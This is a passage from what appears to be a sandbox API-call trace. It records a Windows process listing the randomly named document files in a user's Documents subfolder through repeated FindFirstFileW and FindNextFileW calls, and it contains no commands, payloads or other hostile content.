cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0076.033] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2d8f0, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0x9ca50130, ftLastAccessTime.dwHighDateTime=0x1d4c9b5, ftLastWriteTime.dwLowDateTime=0x9ca50130, ftLastWriteTime.dwHighDateTime=0x1d4c9b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.033] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5f0d180, ftCreationTime.dwHighDateTime=0x1d4d3a7, ftLastAccessTime.dwLowDateTime=0x5608acf0, ftLastAccessTime.dwHighDateTime=0x1d4cc0c, ftLastWriteTime.dwLowDateTime=0x5608acf0, ftLastWriteTime.dwHighDateTime=0x1d4cc0c, nFileSizeHigh=0x0, nFileSizeLow=0xe0b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Lo0OYAD.pdf", cAlternateFileName="")) returned 1 [0076.033] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad316250, ftCreationTime.dwHighDateTime=0x1d4ce74, ftLastAccessTime.dwLowDateTime=0xa4794480, ftLastAccessTime.dwHighDateTime=0x1d4c9c8, ftLastWriteTime.dwLowDateTime=0xa4794480, ftLastWriteTime.dwHighDateTime=0x1d4c9c8, nFileSizeHigh=0x0, nFileSizeLow=0x18e2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="4AKcvcfEnbxcp5c.ods", cAlternateFileName="4AKCVC~1.ODS")) returned 1 [0076.033] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d43200, ftCreationTime.dwHighDateTime=0x1d4ca22, ftLastAccessTime.dwLowDateTime=0x10509b0, ftLastAccessTime.dwHighDateTime=0x1d4cad1, ftLastWriteTime.dwLowDateTime=0x10509b0, ftLastWriteTime.dwHighDateTime=0x1d4cad1, nFileSizeHigh=0x0, nFileSizeLow=0xcbd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="58ln4nXZIZ7q_sl9.rtf", cAlternateFileName="58LN4N~1.RTF")) returned 1 [0076.034] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d6b8270, ftCreationTime.dwHighDateTime=0x1d4c73f, ftLastAccessTime.dwLowDateTime=0xff905ca0, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xff905ca0, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xba10, dwReserved0=0x0, dwReserved1=0x0, cFileName="a5oX7vcF1xLWkgUWyerC.pptx", cAlternateFileName="A5OX7V~1.PPT")) returned 1 [0076.034] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252c94c0, ftCreationTime.dwHighDateTime=0x1d4ca9a, ftLastAccessTime.dwLowDateTime=0x4923ad70, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0x4923ad70, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x5a7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="C8fZE7oaFi0AnXAu.xls", cAlternateFileName="C8FZE7~1.XLS")) returned 1 [0076.034] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68324390, ftCreationTime.dwHighDateTime=0x1d4d50e, ftLastAccessTime.dwLowDateTime=0x25c7e090, ftLastAccessTime.dwHighDateTime=0x1d4d00f, ftLastWriteTime.dwLowDateTime=0x25c7e090, ftLastWriteTime.dwHighDateTime=0x1d4d00f, nFileSizeHigh=0x0, nFileSizeLow=0xd93f, dwReserved0=0x0, dwReserved1=0x0, cFileName="dkyjVp9nb.ods", cAlternateFileName="DKYJVP~1.ODS")) returned 1 [0076.034] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3684510, ftCreationTime.dwHighDateTime=0x1d4d482, ftLastAccessTime.dwLowDateTime=0x9527d00, ftLastAccessTime.dwHighDateTime=0x1d4c5f4, ftLastWriteTime.dwLowDateTime=0x9527d00, ftLastWriteTime.dwHighDateTime=0x1d4c5f4, nFileSizeHigh=0x0, nFileSizeLow=0x1167d, dwReserved0=0x0, dwReserved1=0x0, cFileName="FJQIeMYdsyNYM6c.pps", cAlternateFileName="FJQIEM~1.PPS")) returned 1 [0076.034] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48a34a50, ftCreationTime.dwHighDateTime=0x1d4c619, ftLastAccessTime.dwLowDateTime=0x1df29d70, ftLastAccessTime.dwHighDateTime=0x1d4c799, ftLastWriteTime.dwLowDateTime=0x1df29d70, ftLastWriteTime.dwHighDateTime=0x1d4c799, nFileSizeHigh=0x0, nFileSizeLow=0x1769b, dwReserved0=0x0, dwReserved1=0x0, cFileName="gF KQmnDsTRHyh.xls", cAlternateFileName="GFKQMN~1.XLS")) returned 1 [0076.034] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbec990, ftCreationTime.dwHighDateTime=0x1d4d336, ftLastAccessTime.dwLowDateTime=0x6346a020, ftLastAccessTime.dwHighDateTime=0x1d4ccca, ftLastWriteTime.dwLowDateTime=0x6346a020, ftLastWriteTime.dwHighDateTime=0x1d4ccca, nFileSizeHigh=0x0, nFileSizeLow=0x98b, dwReserved0=0x0, dwReserved1=0x0, cFileName="hDmOCwSIgJOdNXC3ha.xls", cAlternateFileName="HDMOCW~1.XLS")) returned 1 [0076.034] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca746f00, ftCreationTime.dwHighDateTime=0x1d4ce2f, ftLastAccessTime.dwLowDateTime=0x63e194e0, ftLastAccessTime.dwHighDateTime=0x1d4c81a, ftLastWriteTime.dwLowDateTime=0x63e194e0, ftLastWriteTime.dwHighDateTime=0x1d4c81a, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ke7lLvSmwY2sO.doc", cAlternateFileName="KE7LLV~1.DOC")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95206830, ftCreationTime.dwHighDateTime=0x1d4cfbb, ftLastAccessTime.dwLowDateTime=0x139db810, ftLastAccessTime.dwHighDateTime=0x1d4cbcb, ftLastWriteTime.dwLowDateTime=0x139db810, ftLastWriteTime.dwHighDateTime=0x1d4cbcb, nFileSizeHigh=0x0, nFileSizeLow=0x4227, dwReserved0=0x0, dwReserved1=0x0, cFileName="kRh_hD4_.rtf", cAlternateFileName="")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e17f320, ftCreationTime.dwHighDateTime=0x1d4d03a, ftLastAccessTime.dwLowDateTime=0x9f63fb30, ftLastAccessTime.dwHighDateTime=0x1d4c8e6, ftLastWriteTime.dwLowDateTime=0x9f63fb30, ftLastWriteTime.dwHighDateTime=0x1d4c8e6, nFileSizeHigh=0x0, nFileSizeLow=0xab5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="kRK-4zIM.odt", cAlternateFileName="")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20fcb470, ftCreationTime.dwHighDateTime=0x1d4c82e, ftLastAccessTime.dwLowDateTime=0x28ef8280, ftLastAccessTime.dwHighDateTime=0x1d4cc42, ftLastWriteTime.dwLowDateTime=0x28ef8280, ftLastWriteTime.dwHighDateTime=0x1d4cc42, nFileSizeHigh=0x0, nFileSizeLow=0x13dd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p-Z_HZWagLEw2.rtf", cAlternateFileName="P-Z_HZ~1.RTF")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d2f880, ftCreationTime.dwHighDateTime=0x1d4ca8f, ftLastAccessTime.dwLowDateTime=0x10dea320, ftLastAccessTime.dwHighDateTime=0x1d4c5ac, ftLastWriteTime.dwLowDateTime=0x10dea320, ftLastWriteTime.dwHighDateTime=0x1d4c5ac, nFileSizeHigh=0x0, nFileSizeLow=0xe4af, dwReserved0=0x0, dwReserved1=0x0, cFileName="qUHAji.docx", cAlternateFileName="QUHAJI~1.DOC")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a70890, ftCreationTime.dwHighDateTime=0x1d4cab0, ftLastAccessTime.dwLowDateTime=0x50d71480, ftLastAccessTime.dwHighDateTime=0x1d4d2ea, ftLastWriteTime.dwLowDateTime=0x50d71480, ftLastWriteTime.dwHighDateTime=0x1d4d2ea, nFileSizeHigh=0x0, nFileSizeLow=0x12014, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuoAOLx.pps", cAlternateFileName="")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x751ed230, ftCreationTime.dwHighDateTime=0x1d4c604, ftLastAccessTime.dwLowDateTime=0x91394f10, ftLastAccessTime.dwHighDateTime=0x1d4c8cd, ftLastWriteTime.dwLowDateTime=0x91394f10, ftLastWriteTime.dwHighDateTime=0x1d4c8cd, nFileSizeHigh=0x0, nFileSizeLow=0x11b0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="QwKKRF bRs.pps", cAlternateFileName="QWKKRF~1.PPS")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x816aa3d0, ftCreationTime.dwHighDateTime=0x1d4cd7e, ftLastAccessTime.dwLowDateTime=0xbe963d40, ftLastAccessTime.dwHighDateTime=0x1d4cfbe, ftLastWriteTime.dwLowDateTime=0xbe963d40, ftLastWriteTime.dwHighDateTime=0x1d4cfbe, nFileSizeHigh=0x0, nFileSizeLow=0x25d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="sLc4.ots", cAlternateFileName="")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe53d70, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x888f6a30, ftLastAccessTime.dwHighDateTime=0x1d4d0e7, ftLastWriteTime.dwLowDateTime=0x888f6a30, ftLastWriteTime.dwHighDateTime=0x1d4d0e7, nFileSizeHigh=0x0, nFileSizeLow=0x9e1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="vAMsgJG.csv", cAlternateFileName="")) returned 1 [0076.035] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711932f0, ftCreationTime.dwHighDateTime=0x1d4cbab, ftLastAccessTime.dwLowDateTime=0x91f72e80, ftLastAccessTime.dwHighDateTime=0x1d4ce78, ftLastWriteTime.dwLowDateTime=0x91f72e80, ftLastWriteTime.dwHighDateTime=0x1d4ce78, nFileSizeHigh=0x0, nFileSizeLow=0x140d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="WbzYG9EBYngVeBZSG4.odt", cAlternateFileName="WBZYG9~1.ODT")) returned 1 [0076.036] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed75dd0, ftCreationTime.dwHighDateTime=0x1d4cb2b, ftLastAccessTime.dwLowDateTime=0x8d844440, ftLastAccessTime.dwHighDateTime=0x1d4cdd9, ftLastWriteTime.dwLowDateTime=0x8d844440, ftLastWriteTime.dwHighDateTime=0x1d4cdd9, nFileSizeHigh=0x0, nFileSizeLow=0x6f47, dwReserved0=0x0, dwReserved1=0x0, cFileName="wKzYgXHHu.docx", cAlternateFileName="WKZYGX~1.DOC")) returned 1 [0076.036] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x606b1060, ftCreationTime.dwHighDateTime=0x1d4cc7b, ftLastAccessTime.dwLowDateTime=0x5328e720, ftLastAccessTime.dwHighDateTime=0x1d4d3c3, ftLastWriteTime.dwLowDateTime=0x5328e720, ftLastWriteTime.dwHighDateTime=0x1d4d3c3, nFileSizeHigh=0x0, nFileSizeLow=0x154ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="XTH7srL5Om21.doc", cAlternateFileName="XTH7SR~1.DOC")) returned 1 [0076.036] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5b8570, ftCreationTime.dwHighDateTime=0x1d4ccb2, ftLastAccessTime.dwLowDateTime=0x445d90d0, ftLastAccessTime.dwHighDateTime=0x1d4ce5d, ftLastWriteTime.dwLowDateTime=0x445d90d0, ftLastWriteTime.dwHighDateTime=0x1d4ce5d, nFileSizeHigh=0x0, nFileSizeLow=0x113ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="xvA17L8R.xlsx", cAlternateFileName="XVA17L~1.XLS")) returned 1 [0076.036] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa453810, ftCreationTime.dwHighDateTime=0x1d4d48b, ftLastAccessTime.dwLowDateTime=0xce8ca390, ftLastAccessTime.dwHighDateTime=0x1d4cf25, ftLastWriteTime.dwLowDateTime=0xce8ca390, ftLastWriteTime.dwHighDateTime=0x1d4cf25, nFileSizeHigh=0x0, nFileSizeLow=0x161ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="YnO -aU8WOlRIF.csv", cAlternateFileName="YNO-AU~1.CSV")) returned 1 [0076.036] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0076.036] FindClose (in: hFindFile=0x1a5de090 | out: hFindFile=0x1a5de090) returned 1 [0076.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d1d0) returned 1 [0076.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d190) returned 1 [0076.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d280) returned 1 [0076.036] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U", nBufferLength=0x105, lpBuffer=0x1bf5cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U", lpFilePart=0x0) returned 0x30 [0076.036] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\", nBufferLength=0x105, lpBuffer=0x1bf5cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\", lpFilePart=0x0) returned 0x31 [0076.037] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\*", lpFindFileData=0x1bf5cf20 | out: lpFindFileData=0x1bf5cf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2d8f0, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0x9ca50130, ftLastAccessTime.dwHighDateTime=0x1d4c9b5, ftLastWriteTime.dwLowDateTime=0x9ca50130, ftLastWriteTime.dwHighDateTime=0x1d4c9b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de090 [0076.037] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f2d8f0, ftCreationTime.dwHighDateTime=0x1d4ca6e, ftLastAccessTime.dwLowDateTime=0x9ca50130, ftLastAccessTime.dwHighDateTime=0x1d4c9b5, ftLastWriteTime.dwLowDateTime=0x9ca50130, ftLastWriteTime.dwHighDateTime=0x1d4c9b5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.037] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5f0d180, ftCreationTime.dwHighDateTime=0x1d4d3a7, ftLastAccessTime.dwLowDateTime=0x5608acf0, ftLastAccessTime.dwHighDateTime=0x1d4cc0c, ftLastWriteTime.dwLowDateTime=0x5608acf0, ftLastWriteTime.dwHighDateTime=0x1d4cc0c, nFileSizeHigh=0x0, nFileSizeLow=0xe0b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Lo0OYAD.pdf", cAlternateFileName="")) returned 1 [0076.037] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad316250, ftCreationTime.dwHighDateTime=0x1d4ce74, ftLastAccessTime.dwLowDateTime=0xa4794480, ftLastAccessTime.dwHighDateTime=0x1d4c9c8, ftLastWriteTime.dwLowDateTime=0xa4794480, ftLastWriteTime.dwHighDateTime=0x1d4c9c8, nFileSizeHigh=0x0, nFileSizeLow=0x18e2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="4AKcvcfEnbxcp5c.ods", cAlternateFileName="4AKCVC~1.ODS")) returned 1 [0076.037] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8d43200, ftCreationTime.dwHighDateTime=0x1d4ca22, ftLastAccessTime.dwLowDateTime=0x10509b0, ftLastAccessTime.dwHighDateTime=0x1d4cad1, ftLastWriteTime.dwLowDateTime=0x10509b0, ftLastWriteTime.dwHighDateTime=0x1d4cad1, nFileSizeHigh=0x0, nFileSizeLow=0xcbd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="58ln4nXZIZ7q_sl9.rtf", cAlternateFileName="58LN4N~1.RTF")) returned 1 [0076.037] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d6b8270, ftCreationTime.dwHighDateTime=0x1d4c73f, ftLastAccessTime.dwLowDateTime=0xff905ca0, ftLastAccessTime.dwHighDateTime=0x1d4c973, ftLastWriteTime.dwLowDateTime=0xff905ca0, ftLastWriteTime.dwHighDateTime=0x1d4c973, nFileSizeHigh=0x0, nFileSizeLow=0xba10, dwReserved0=0x0, dwReserved1=0x0, cFileName="a5oX7vcF1xLWkgUWyerC.pptx", cAlternateFileName="A5OX7V~1.PPT")) returned 1 [0076.038] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252c94c0, ftCreationTime.dwHighDateTime=0x1d4ca9a, ftLastAccessTime.dwLowDateTime=0x4923ad70, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0x4923ad70, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x5a7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="C8fZE7oaFi0AnXAu.xls", cAlternateFileName="C8FZE7~1.XLS")) returned 1 [0076.038] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68324390, ftCreationTime.dwHighDateTime=0x1d4d50e, ftLastAccessTime.dwLowDateTime=0x25c7e090, ftLastAccessTime.dwHighDateTime=0x1d4d00f, ftLastWriteTime.dwLowDateTime=0x25c7e090, ftLastWriteTime.dwHighDateTime=0x1d4d00f, nFileSizeHigh=0x0, nFileSizeLow=0xd93f, dwReserved0=0x0, dwReserved1=0x0, cFileName="dkyjVp9nb.ods", cAlternateFileName="DKYJVP~1.ODS")) returned 1 [0076.038] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3684510, ftCreationTime.dwHighDateTime=0x1d4d482, ftLastAccessTime.dwLowDateTime=0x9527d00, ftLastAccessTime.dwHighDateTime=0x1d4c5f4, ftLastWriteTime.dwLowDateTime=0x9527d00, ftLastWriteTime.dwHighDateTime=0x1d4c5f4, nFileSizeHigh=0x0, nFileSizeLow=0x1167d, dwReserved0=0x0, dwReserved1=0x0, cFileName="FJQIeMYdsyNYM6c.pps", cAlternateFileName="FJQIEM~1.PPS")) returned 1 [0076.038] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48a34a50, ftCreationTime.dwHighDateTime=0x1d4c619, ftLastAccessTime.dwLowDateTime=0x1df29d70, ftLastAccessTime.dwHighDateTime=0x1d4c799, ftLastWriteTime.dwLowDateTime=0x1df29d70, ftLastWriteTime.dwHighDateTime=0x1d4c799, nFileSizeHigh=0x0, nFileSizeLow=0x1769b, dwReserved0=0x0, dwReserved1=0x0, cFileName="gF KQmnDsTRHyh.xls", cAlternateFileName="GFKQMN~1.XLS")) returned 1 [0076.038] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bbec990, ftCreationTime.dwHighDateTime=0x1d4d336, ftLastAccessTime.dwLowDateTime=0x6346a020, ftLastAccessTime.dwHighDateTime=0x1d4ccca, ftLastWriteTime.dwLowDateTime=0x6346a020, ftLastWriteTime.dwHighDateTime=0x1d4ccca, nFileSizeHigh=0x0, nFileSizeLow=0x98b, dwReserved0=0x0, dwReserved1=0x0, cFileName="hDmOCwSIgJOdNXC3ha.xls", cAlternateFileName="HDMOCW~1.XLS")) returned 1 [0076.038] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca746f00, ftCreationTime.dwHighDateTime=0x1d4ce2f, ftLastAccessTime.dwLowDateTime=0x63e194e0, ftLastAccessTime.dwHighDateTime=0x1d4c81a, ftLastWriteTime.dwLowDateTime=0x63e194e0, ftLastWriteTime.dwHighDateTime=0x1d4c81a, nFileSizeHigh=0x0, nFileSizeLow=0x734, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ke7lLvSmwY2sO.doc", cAlternateFileName="KE7LLV~1.DOC")) returned 1 [0076.039] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95206830, ftCreationTime.dwHighDateTime=0x1d4cfbb, ftLastAccessTime.dwLowDateTime=0x139db810, ftLastAccessTime.dwHighDateTime=0x1d4cbcb, ftLastWriteTime.dwLowDateTime=0x139db810, ftLastWriteTime.dwHighDateTime=0x1d4cbcb, nFileSizeHigh=0x0, nFileSizeLow=0x4227, dwReserved0=0x0, dwReserved1=0x0, cFileName="kRh_hD4_.rtf", cAlternateFileName="")) returned 1 [0076.039] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e17f320, ftCreationTime.dwHighDateTime=0x1d4d03a, ftLastAccessTime.dwLowDateTime=0x9f63fb30, ftLastAccessTime.dwHighDateTime=0x1d4c8e6, ftLastWriteTime.dwLowDateTime=0x9f63fb30, ftLastWriteTime.dwHighDateTime=0x1d4c8e6, nFileSizeHigh=0x0, nFileSizeLow=0xab5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="kRK-4zIM.odt", cAlternateFileName="")) returned 1 [0076.039] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20fcb470, ftCreationTime.dwHighDateTime=0x1d4c82e, ftLastAccessTime.dwLowDateTime=0x28ef8280, ftLastAccessTime.dwHighDateTime=0x1d4cc42, ftLastWriteTime.dwLowDateTime=0x28ef8280, ftLastWriteTime.dwHighDateTime=0x1d4cc42, nFileSizeHigh=0x0, nFileSizeLow=0x13dd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="p-Z_HZWagLEw2.rtf", cAlternateFileName="P-Z_HZ~1.RTF")) returned 1 [0076.039] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60d2f880, ftCreationTime.dwHighDateTime=0x1d4ca8f, ftLastAccessTime.dwLowDateTime=0x10dea320, ftLastAccessTime.dwHighDateTime=0x1d4c5ac, ftLastWriteTime.dwLowDateTime=0x10dea320, ftLastWriteTime.dwHighDateTime=0x1d4c5ac, nFileSizeHigh=0x0, nFileSizeLow=0xe4af, dwReserved0=0x0, dwReserved1=0x0, cFileName="qUHAji.docx", cAlternateFileName="QUHAJI~1.DOC")) returned 1 [0076.039] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a70890, ftCreationTime.dwHighDateTime=0x1d4cab0, ftLastAccessTime.dwLowDateTime=0x50d71480, ftLastAccessTime.dwHighDateTime=0x1d4d2ea, ftLastWriteTime.dwLowDateTime=0x50d71480, ftLastWriteTime.dwHighDateTime=0x1d4d2ea, nFileSizeHigh=0x0, nFileSizeLow=0x12014, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuoAOLx.pps", cAlternateFileName="")) returned 1 [0076.039] FindNextFileW (in: hFindFile=0x1a5de090, lpFindFileData=0x1bf5cf70 | out: lpFindFileData=0x1bf5cf70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x751ed230, ftCreationTime.dwHighDateTime=0x1d4c604, ftLastAccessTime.dwLowDateTime=0x91394f10, 